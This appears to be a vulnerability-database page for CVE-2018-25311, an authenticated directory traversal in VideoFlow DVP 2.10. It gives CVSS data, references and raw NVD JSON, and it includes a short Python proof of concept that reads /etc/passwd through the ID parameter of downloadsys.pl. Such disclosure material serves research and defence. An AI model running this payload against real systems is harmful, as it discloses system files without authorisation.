CVE-2018-25311

Description

VideoFlow Digital Video Protection DVP 2.10 contains an authenticated directory traversal vulnerability that allows authenticated attackers to disclose arbitrary files by injecting path traversal sequences in the ID parameter. Attackers can submit requests to downloadsys.pl, download_xml.pl, download.pl, downloadmib.pl, or downloadFile.pl with directory traversal payloads to read sensitive system files like /etc/passwd.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

VideoFlow Digital Video Protection DVP 2.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2018-25311: VideoFlow DVP Authenticated Directory Traversal
# Usage: python3 poc.py <target_url> <session_cookie>

import requests
import sys

def exploit(target, cookie):
    # Vulnerable endpoint mentioned in advisory
    url = f"{target.rstrip('/')}/downloadsys.pl"
    
    # Directory traversal payload to read /etc/passwd
    payload = {
        "ID": "../../../../../../../../etc/passwd"
    }
    
    # Headers with authenticated session cookie
    headers = {
        "Cookie": cookie,
        "User-Agent": "CVE-2018-25311-Scanner"
    }
    
    try:
        print(f"[+] Sending request to {url}...")
        response = requests.get(url, params=payload, headers=headers, timeout=10)
        
        if response.status_code == 200 and "root:" in response.text:
            print("[+] Exploit successful! /etc/passwd content:")
            print(response.text)
        else:
            print("[-] Exploit failed or file not found.")
            print(response.text[:200])
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} http://target-ip "SESSION_ID=xxxxxx"")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25311
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25311
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25311/
[4] VulDB https://vuldb.com/cve/CVE-2018-25311
[5] https://www.exploit-db.com/exploits/44386
[6] https://www.vulncheck.com/advisories/videoflow-digital-video-protection-dvp-10-authenticated-directory-traversal-x-prototype-version
[7] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25311", "sourceIdentifier": "[email protected]", "published": "2026-04-29T20:16:26.760", "lastModified": "2026-04-29T21:22:20.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "VideoFlow Digital Video Protection DVP 2.10 contains an authenticated directory traversal vulnerability that allows authenticated attackers to disclose arbitrary files by injecting path traversal sequences in the ID parameter. Attackers can submit requests to downloadsys.pl, download_xml.pl, download.pl, downloadmib.pl, or downloadFile.pl with directory traversal payloads to read sensitive system files like /etc/passwd."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44386", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/videoflow-digital-video-protection-dvp-10-authenticated-directory-traversal-x-prototype-version", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php", "source": "[email protected]"}]}}